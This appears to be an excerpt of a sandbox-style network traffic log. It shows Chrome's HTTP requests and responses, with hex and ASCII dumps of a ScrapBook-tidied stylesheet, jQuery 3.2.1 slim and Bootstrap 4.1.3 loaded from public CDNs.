                                                                  2024-12-30 21:42:35 UTC494INData Raw: 2f 2a 20 43 6f 64 65 20 74 69 64 69 65 64 20 75 70 20 62 79 20 53 63 72 61 70 42 6f 6f 6b 20 2a 2f 0a 2e 6c 69 67 68 74 47 72 65 65 6e 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 72 67 62 28 32 30 38 2c 20 32 33 37 2c 20 36 29 3b 20 7d 0a 2e 6d 65 44 61 72 6b 47 72 65 65 6e 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 72 67 62 28 31 32 34 2c 20 31 36 39 2c 20 33 29 3b 20 7d 0a 2e 6d 65 4c 69 67 68 74 47 72 61 79 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 72 67 62 28 32 33 38 2c 20 32 33 38 2c 20 32 33 38 29 3b 20 7d 0a 2e 74 61 62 73 54 61 62 6c 65 20 7b 20 62 6f 72 64 65 72 2d 63 6f 6c 6c 61 70 73 65 3a 20 63 6f 6c 6c 61 70 73 65 3b 20 70 61 64 64 69 6e 67 3a 20 30 70 78 3b 20 7d 0a 2e 74 61 62 73
                                                                  Data Ascii: /* Code tidied up by ScrapBook */.lightGreen { background-color: rgb(208, 237, 6); }.meDarkGreen { background-color: rgb(124, 169, 3); }.meLightGray { background-color: rgb(238, 238, 238); }.tabsTable { border-collapse: collapse; padding: 0px; }.tabs
                                                                  2024-12-30 21:42:35 UTC1369INData Raw: 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 72 67 62 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 29 3b 20 68 65 69 67 68 74 3a 20 31 2e 32 65 6d 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 20 77 69 64 74 68 3a 20 31 36 33 70 78 3b 20 70 61 64 64 69 6e 67 3a 20 33 70 78 3b 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 28 32 30 34 2c 20 32 30 34 2c 20 32 30 34 29 3b 20 7d 0a 2e 61 78 34 74 61 62 63 6f 6d 6d 6f 6e 67 20 7b 20 77 69 64 74 68 3a 20 38 30 70 78 3b 20 68 65 69 67 68 74 3a 20 32 33 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 63 75 72 73 6f 72 3a 20 70 6f 69 6e 74 65 72 3b 20 2d 6d 6f 7a 2d 75 73 65 72 2d 73 65 6c 65 63 74 3a 20 6e 6f 6e 65 3b 20 7d 0a 2e 61 78 34 74 61 62 20 7b 20
                                                                  Data Ascii: background-color: rgb(255, 255, 255); height: 1.2em; font-size: 12px; width: 163px; padding: 3px; border: 1px solid rgb(204, 204, 204); }.ax4tabcommong { width: 80px; height: 23px; text-align: center; cursor: pointer; -moz-user-select: none; }.ax4tab {
                                                                  2024-12-30 21:42:35 UTC776INData Raw: 6f 6e 74 65 6e 74 2e 70 6e 67 22 29 3b 20 7d 0a 2e 6d 65 42 75 74 74 6f 6e 49 6d 61 67 65 4c 65 66 74 43 61 63 68 65 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 22 62 75 74 74 6f 6e 2d 6c 65 66 74 2e 70 6e 67 22 29 3b 20 7d 0a 2e 6d 65 42 75 74 74 6f 6e 49 6d 61 67 65 52 69 67 68 74 43 61 63 68 65 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 22 62 75 74 74 6f 6e 2d 72 69 67 68 74 2e 70 6e 67 22 29 3b 20 7d 0a 2e 6d 65 62 75 74 74 6f 6e 48 6f 76 65 72 20 2e 6d 65 42 75 74 74 6f 6e 49 6d 61 67 65 43 6f 6e 74 65 6e 74 48 6f 76 65 72 43 61 63 68 65 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 22 62 75 74 74 6f 6e 2d 63 6f 6e 74 65 6e 74 2d 68 6f 76 65 72 2e 70 6e 67 22
                                                                  Data Ascii: ontent.png"); }.meButtonImageLeftCache { background-image: url("button-left.png"); }.meButtonImageRightCache { background-image: url("button-right.png"); }.mebuttonHover .meButtonImageContentHoverCache { background-image: url("button-content-hover.png"


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  45192.168.2.458504151.101.194.137443888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-30 21:42:34 UTC363OUTGET /jquery-3.2.1.slim.min.js HTTP/1.1
                                                                  Host: code.jquery.com
                                                                  Connection: keep-alive
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  Accept: */*
                                                                  Sec-Fetch-Site: none
                                                                  Sec-Fetch-Mode: cors
                                                                  Sec-Fetch-Dest: empty
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2024-12-30 21:42:34 UTC612INHTTP/1.1 200 OK
                                                                  Connection: close
                                                                  Content-Length: 69597
                                                                  Server: nginx
                                                                  Content-Type: application/javascript; charset=utf-8
                                                                  Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                  ETag: "28feccc0-10fdd"
                                                                  Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                  Access-Control-Allow-Origin: *
                                                                  Cross-Origin-Resource-Policy: cross-origin
                                                                  Via: 1.1 varnish, 1.1 varnish
                                                                  Accept-Ranges: bytes
                                                                  Age: 1154855
                                                                  Date: Mon, 30 Dec 2024 21:42:34 GMT
                                                                  X-Served-By: cache-lga21984-LGA, cache-ewr-kewr1740059-EWR
                                                                  X-Cache: HIT, HIT
                                                                  X-Cache-Hits: 507, 0
                                                                  X-Timer: S1735594955.589590,VS0,VE1
                                                                  Vary: Accept-Encoding
                                                                  2024-12-30 21:42:34 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 32 2e 31 20 2d 61 6a 61 78 2c 2d 61 6a 61 78 2f 6a 73 6f 6e 70 2c 2d 61 6a 61 78 2f 6c 6f 61 64 2c 2d 61 6a 61 78 2f 70 61 72 73 65 58 4d 4c 2c 2d 61 6a 61 78 2f 73 63 72 69 70 74 2c 2d 61 6a 61 78 2f 76 61 72 2f 6c 6f 63 61 74 69 6f 6e 2c 2d 61 6a 61 78 2f 76 61 72 2f 6e 6f 6e 63 65 2c 2d 61 6a 61 78 2f 76 61 72 2f 72 71 75 65 72 79 2c 2d 61 6a 61 78 2f 78 68 72 2c 2d 6d 61 6e 69 70 75 6c 61 74 69 6f 6e 2f 5f 65 76 61 6c 55 72 6c 2c 2d 65 76 65 6e 74 2f 61 6a 61 78 2c 2d 65 66 66 65 63 74 73 2c 2d 65 66 66 65 63 74 73 2f 54 77 65 65 6e 2c 2d 65 66 66 65 63 74 73 2f 61 6e 69 6d 61 74 65 64 53 65 6c 65 63 74 6f 72 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e
                                                                  Data Ascii: /*! jQuery v3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_evalUrl,-event/ajax,-effects,-effects/Tween,-effects/animatedSelector | (c) JS Foundation and other con
                                                                  2024-12-30 21:42:34 UTC1378INData Raw: 5b 61 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 72 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 61 29 3b 72 65 74 75 72 6e 20 62 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 62 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 72 2e 65 61 63 68 28 74 68 69 73 2c 61 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 72 2e 6d 61 70 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 72 65 74 75 72 6e 20 61 2e 63 61 6c 6c 28 62 2c 63 2c 62 29 7d 29 29 7d 2c 73 6c 69 63 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61
                                                                  Data Ascii: [a]},pushStack:function(a){var b=r.merge(this.constructor(),a);return b.prevObject=this,b},each:function(a){return r.each(this,a)},map:function(a){return this.pushStack(r.map(this,function(b,c){return a.call(b,c,b)}))},slice:function(){return this.pushSta
                                                                  2024-12-30 21:42:34 UTC1378INData Raw: 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6b 2e 63 61 6c 6c 28 61 29 29 26 26 28 21 28 62 3d 65 28 61 29 29 7c 7c 28 63 3d 6c 2e 63 61 6c 6c 28 62 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 62 2e 63 6f 6e 73 74 72 75 63 74 6f 72 2c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 63 26 26 6d 2e 63 61 6c 6c 28 63 29 3d 3d 3d 6e 29 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3b 66 6f 72 28 62 20 69 6e 20 61 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 74 79 70 65 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 61 3f 61 2b 22 22 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 61 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70
                                                                  Data Ascii: ject Object]"!==k.call(a))&&(!(b=e(a))||(c=l.call(b,"constructor")&&b.constructor,"function"==typeof c&&m.call(c)===n))},isEmptyObject:function(a){var b;for(b in a)return!1;return!0},type:function(a){return null==a?a+"":"object"==typeof a||"function"==typ
                                                                  2024-12-30 21:42:34 UTC1378INData Raw: 6e 6f 77 2c 73 75 70 70 6f 72 74 3a 6f 7d 29 2c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 28 72 2e 66 6e 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 3d 63 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 29 2c 72 2e 65 61 63 68 28 22 42 6f 6f 6c 65 61 6e 20 4e 75 6d 62 65 72 20 53 74 72 69 6e 67 20 46 75 6e 63 74 69 6f 6e 20 41 72 72 61 79 20 44 61 74 65 20 52 65 67 45 78 70 20 4f 62 6a 65 63 74 20 45 72 72 6f 72 20 53 79 6d 62 6f 6c 22 2e 73 70 6c 69 74 28 22 20 22 29 2c 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 6a 5b 22 5b 6f 62 6a 65 63 74 20 22 2b 62 2b 22 5d 22 5d 3d 62 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 77 28 61 29 7b 76 61 72 20 62 3d 21 21 61 26 26 22 6c 65
                                                                  Data Ascii: now,support:o}),"function"==typeof Symbol&&(r.fn[Symbol.iterator]=c[Symbol.iterator]),r.each("Boolean Number String Function Array Date RegExp Object Error Symbol".split(" "),function(a,b){j["[object "+b+"]"]=b.toLowerCase()});function w(a){var b=!!a&&"le
                                                                  2024-12-30 21:42:34 UTC1378INData Raw: 22 29 22 29 2c 43 4c 41 53 53 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 5c 5c 2e 28 22 2b 4c 2b 22 29 22 29 2c 54 41 47 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 28 22 2b 4c 2b 22 7c 5b 2a 5d 29 22 29 2c 41 54 54 52 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 22 2b 4d 29 2c 50 53 45 55 44 4f 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 22 2b 4e 29 2c 43 48 49 4c 44 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 3a 28 6f 6e 6c 79 7c 66 69 72 73 74 7c 6c 61 73 74 7c 6e 74 68 7c 6e 74 68 2d 6c 61 73 74 29 2d 28 63 68 69 6c 64 7c 6f 66 2d 74 79 70 65 29 28 3f 3a 5c 5c 28 22 2b 4b 2b 22 2a 28 65 76 65 6e 7c 6f 64 64 7c 28 28 5b 2b 2d 5d 7c 29 28 5c 5c 64 2a 29 6e 7c 29 22 2b 4b 2b 22 2a 28 3f 3a 28 5b 2b 2d 5d 7c 29 22 2b 4b 2b 22 2a 28 5c 5c 64 2b 29 7c 29 29 22 2b 4b
                                                                  Data Ascii: ")"),CLASS:new RegExp("^\\.("+L+")"),TAG:new RegExp("^("+L+"|[*])"),ATTR:new RegExp("^"+M),PSEUDO:new RegExp("^"+N),CHILD:new RegExp("^:(only|first|last|nth|nth-last)-(child|of-type)(?:\\("+K+"*(even|odd|(([+-]|)(\\d*)n|)"+K+"*(?:([+-]|)"+K+"*(\\d+)|))"+K
                                                                  2024-12-30 21:42:34 UTC1378INData Raw: 3d 3d 77 26 26 31 31 21 3d 3d 77 29 72 65 74 75 72 6e 20 64 3b 69 66 28 21 65 26 26 28 28 62 3f 62 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 62 3a 76 29 21 3d 3d 6e 26 26 6d 28 62 29 2c 62 3d 62 7c 7c 6e 2c 70 29 29 7b 69 66 28 31 31 21 3d 3d 77 26 26 28 6c 3d 5a 2e 65 78 65 63 28 61 29 29 29 69 66 28 66 3d 6c 5b 31 5d 29 7b 69 66 28 39 3d 3d 3d 77 29 7b 69 66 28 21 28 6a 3d 62 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 66 29 29 29 72 65 74 75 72 6e 20 64 3b 69 66 28 6a 2e 69 64 3d 3d 3d 66 29 72 65 74 75 72 6e 20 64 2e 70 75 73 68 28 6a 29 2c 64 7d 65 6c 73 65 20 69 66 28 73 26 26 28 6a 3d 73 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 66 29 29 26 26 74 28 62 2c 6a 29 26 26 6a 2e 69 64 3d 3d 3d 66 29 72 65 74 75 72 6e 20 64 2e 70 75 73 68
                                                                  Data Ascii: ==w&&11!==w)return d;if(!e&&((b?b.ownerDocument||b:v)!==n&&m(b),b=b||n,p)){if(11!==w&&(l=Z.exec(a)))if(f=l[1]){if(9===w){if(!(j=b.getElementById(f)))return d;if(j.id===f)return d.push(j),d}else if(s&&(j=s.getElementById(f))&&t(b,j)&&j.id===f)return d.push
                                                                  2024-12-30 21:42:34 UTC1378INData Raw: 20 6d 61 28 61 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 62 29 7b 76 61 72 20 63 3d 62 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 72 65 74 75 72 6e 22 69 6e 70 75 74 22 3d 3d 3d 63 26 26 62 2e 74 79 70 65 3d 3d 3d 61 7d 7d 66 75 6e 63 74 69 6f 6e 20 6e 61 28 61 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 62 29 7b 76 61 72 20 63 3d 62 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 72 65 74 75 72 6e 28 22 69 6e 70 75 74 22 3d 3d 3d 63 7c 7c 22 62 75 74 74 6f 6e 22 3d 3d 3d 63 29 26 26 62 2e 74 79 70 65 3d 3d 3d 61 7d 7d 66 75 6e 63 74 69 6f 6e 20 6f 61 28 61 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 62 29 7b 72 65 74 75 72 6e 22 66 6f 72 6d 22 69 6e 20 62 3f 62 2e 70 61
                                                                  Data Ascii: ma(a){return function(b){var c=b.nodeName.toLowerCase();return"input"===c&&b.type===a}}function na(a){return function(b){var c=b.nodeName.toLowerCase();return("input"===c||"button"===c)&&b.type===a}}function oa(a){return function(b){return"form"in b?b.pa
                                                                  2024-12-30 21:42:34 UTC1378INData Raw: 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 4e 61 6d 65 7c 7c 21 6e 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 4e 61 6d 65 28 75 29 2e 6c 65 6e 67 74 68 7d 29 2c 63 2e 67 65 74 42 79 49 64 3f 28 64 2e 66 69 6c 74 65 72 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 61 2e 72 65 70 6c 61 63 65 28 5f 2c 61 61 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 3d 3d 3d 62 7d 7d 2c 64 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 62 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 70 29 7b 76 61 72 20 63 3d 62 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 61 29
                                                                  Data Ascii: getElementsByName||!n.getElementsByName(u).length}),c.getById?(d.filter.ID=function(a){var b=a.replace(_,aa);return function(a){return a.getAttribute("id")===b}},d.find.ID=function(a,b){if("undefined"!=typeof b.getElementById&&p){var c=b.getElementById(a)
                                                                  2024-12-30 21:42:34 UTC1378INData Raw: 2e 70 75 73 68 28 22 5b 2a 5e 24 5d 3d 22 2b 4b 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 73 65 6c 65 63 74 65 64 5d 22 29 2e 6c 65 6e 67 74 68 7c 7c 71 2e 70 75 73 68 28 22 5c 5c 5b 22 2b 4b 2b 22 2a 28 3f 3a 76 61 6c 75 65 7c 22 2b 4a 2b 22 29 22 29 2c 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 69 64 7e 3d 22 2b 75 2b 22 2d 5d 22 29 2e 6c 65 6e 67 74 68 7c 7c 71 2e 70 75 73 68 28 22 7e 3d 22 29 2c 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 71 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 75 2b 22 2b 2a 22 29 2e
                                                                  Data Ascii: .push("[*^$]="+K+"*(?:''|\"\")"),a.querySelectorAll("[selected]").length||q.push("\\["+K+"*(?:value|"+J+")"),a.querySelectorAll("[id~="+u+"-]").length||q.push("~="),a.querySelectorAll(":checked").length||q.push(":checked"),a.querySelectorAll("a#"+u+"+*").
                                                                  2024-12-30 21:42:34 UTC1378INData Raw: 65 29 69 66 28 62 3d 3d 3d 61 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 42 3d 62 3f 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 61 3d 3d 3d 62 29 72 65 74 75 72 6e 20 6c 3d 21 30 2c 30 3b 76 61 72 20 64 3d 21 61 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 62 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 64 3f 64 3a 28 64 3d 28 61 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 61 29 3d 3d 3d 28 62 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 62 29 3f 61 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 62 29 3a 31 2c 31 26 64 7c 7c 21 63 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 62 2e 63 6f 6d 70 61 72 65 44 6f 63 75
                                                                  Data Ascii: e)if(b===a)return!0;return!1},B=b?function(a,b){if(a===b)return l=!0,0;var d=!a.compareDocumentPosition-!b.compareDocumentPosition;return d?d:(d=(a.ownerDocument||a)===(b.ownerDocument||b)?a.compareDocumentPosition(b):1,1&d||!c.sortDetached&&b.compareDocu


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  46192.168.2.458505104.18.10.207443888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-30 21:42:34 UTC385OUTGET /bootstrap/4.1.3/js/bootstrap.min.js HTTP/1.1
                                                                  Host: stackpath.bootstrapcdn.com
                                                                  Connection: keep-alive
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  Accept: */*
                                                                  Sec-Fetch-Site: none
                                                                  Sec-Fetch-Mode: cors
                                                                  Sec-Fetch-Dest: empty
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2024-12-30 21:42:34 UTC966INHTTP/1.1 200 OK
                                                                  Date: Mon, 30 Dec 2024 21:42:34 GMT
                                                                  Content-Type: application/javascript; charset=utf-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CDN-PullZone: 252412
                                                                  CDN-Uid: b1941f61-b576-4f40-80de-5677acb38f74
                                                                  CDN-RequestCountryCode: US
                                                                  Vary: Accept-Encoding
                                                                  Access-Control-Allow-Origin: *
                                                                  Cache-Control: public, max-age=31919000
                                                                  ETag: W/"67176c242e1bdc20603c878dee836df3"
                                                                  Last-Modified: Mon, 25 Jan 2021 22:04:06 GMT
                                                                  CDN-ProxyVer: 1.04
                                                                  CDN-RequestPullSuccess: True
                                                                  CDN-RequestPullCode: 200
                                                                  CDN-CachedAt: 10/04/2024 02:53:43
                                                                  CDN-EdgeStorageId: 1029
                                                                  timing-allow-origin: *
                                                                  cross-origin-resource-policy: cross-origin
                                                                  X-Content-Type-Options: nosniff
                                                                  CDN-Status: 200
                                                                  CDN-RequestTime: 1
                                                                  CDN-RequestId: 7fedeed1ac4f734c4f5baf0abe375bbe
                                                                  CDN-Cache: HIT
                                                                  CF-Cache-Status: HIT
                                                                  Age: 485063
                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                  Server: cloudflare
                                                                  CF-RAY: 8fa5335239df728a-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  2024-12-30 21:42:34 UTC403INData Raw: 37 62 65 64 0d 0a 2f 2a 21 0a 20 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 34 2e 31 2e 33 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 2f 29 0a 20 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 38 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 67 72 61 70 68 73 2f 63 6f 6e 74 72 69 62 75 74 6f 72 73 29 0a 20 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 29 0a 20 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28
                                                                  Data Ascii: 7bed/*! * Bootstrap v4.1.3 (https://getbootstrap.com/) * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors) * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) */!function(
                                                                  2024-12-30 21:42:34 UTC1369INData Raw: 66 69 6e 65 28 5b 22 65 78 70 6f 72 74 73 22 2c 22 6a 71 75 65 72 79 22 2c 22 70 6f 70 70 65 72 2e 6a 73 22 5d 2c 65 29 3a 65 28 74 2e 62 6f 6f 74 73 74 72 61 70 3d 7b 7d 2c 74 2e 6a 51 75 65 72 79 2c 74 2e 50 6f 70 70 65 72 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 68 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 69 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 3b 6e 3c 65 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 7b 76 61 72 20 69 3d 65 5b 6e 5d 3b 69 2e 65 6e 75 6d 65 72 61 62 6c 65 3d 69 2e 65 6e 75 6d 65 72 61 62 6c 65 7c 7c 21 31 2c 69 2e 63 6f 6e 66 69 67 75 72 61 62 6c 65 3d 21 30 2c 22 76 61 6c 75 65 22 69 6e 20 69 26 26 28 69 2e 77 72 69 74 61 62 6c 65 3d 21 30 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69
                                                                  Data Ascii: fine(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,h){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defi
                                                                  2024-12-30 21:42:34 UTC1369INData Raw: 2c 50 6e 2c 6a 6e 2c 48 6e 2c 4c 6e 2c 52 6e 2c 78 6e 2c 57 6e 2c 55 6e 2c 71 6e 2c 46 6e 3d 66 75 6e 63 74 69 6f 6e 28 69 29 7b 76 61 72 20 65 3d 22 74 72 61 6e 73 69 74 69 6f 6e 65 6e 64 22 3b 66 75 6e 63 74 69 6f 6e 20 74 28 74 29 7b 76 61 72 20 65 3d 74 68 69 73 2c 6e 3d 21 31 3b 72 65 74 75 72 6e 20 69 28 74 68 69 73 29 2e 6f 6e 65 28 6c 2e 54 52 41 4e 53 49 54 49 4f 4e 5f 45 4e 44 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 3d 21 30 7d 29 2c 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 7c 7c 6c 2e 74 72 69 67 67 65 72 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 28 65 29 7d 2c 74 29 2c 74 68 69 73 7d 76 61 72 20 6c 3d 7b 54 52 41 4e 53 49 54 49 4f 4e 5f 45 4e 44 3a 22 62 73 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 22 2c 67 65 74 55 49 44
                                                                  Data Ascii: ,Pn,jn,Hn,Ln,Rn,xn,Wn,Un,qn,Fn=function(i){var e="transitionend";function t(t){var e=this,n=!1;return i(this).one(l.TRANSITION_END,function(){n=!0}),setTimeout(function(){n||l.triggerTransitionEnd(e)},t),this}var l={TRANSITION_END:"bsTransitionEnd",getUID
                                                                  2024-12-30 21:42:34 UTC1369INData Raw: 61 6e 64 6c 65 72 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 7d 2c 6c 7d 28 65 29 2c 4b 6e 3d 28 6e 3d 22 61 6c 65 72 74 22 2c 61 3d 22 2e 22 2b 28 6f 3d 22 62 73 2e 61 6c 65 72 74 22 29 2c 63 3d 28 72 3d 65 29 2e 66 6e 5b 6e 5d 2c 75 3d 7b 43 4c 4f 53 45 3a 22 63 6c 6f 73 65 22 2b 61 2c 43 4c 4f 53 45 44 3a 22 63 6c 6f 73 65 64 22 2b 61 2c 43 4c 49 43 4b 5f 44 41 54 41 5f 41 50 49 3a 22 63 6c 69 63 6b 22 2b 61 2b 22 2e 64 61 74 61 2d 61 70 69 22 7d 2c 66 3d 22 61 6c 65 72 74 22 2c 64 3d 22 66 61 64 65 22 2c 67 3d 22 73 68 6f 77 22 2c 5f 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 69 28 74 29 7b 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 3d 74 7d 76 61 72 20 74 3d 69 2e 70 72 6f 74 6f 74 79 70 65 3b 72 65 74 75 72
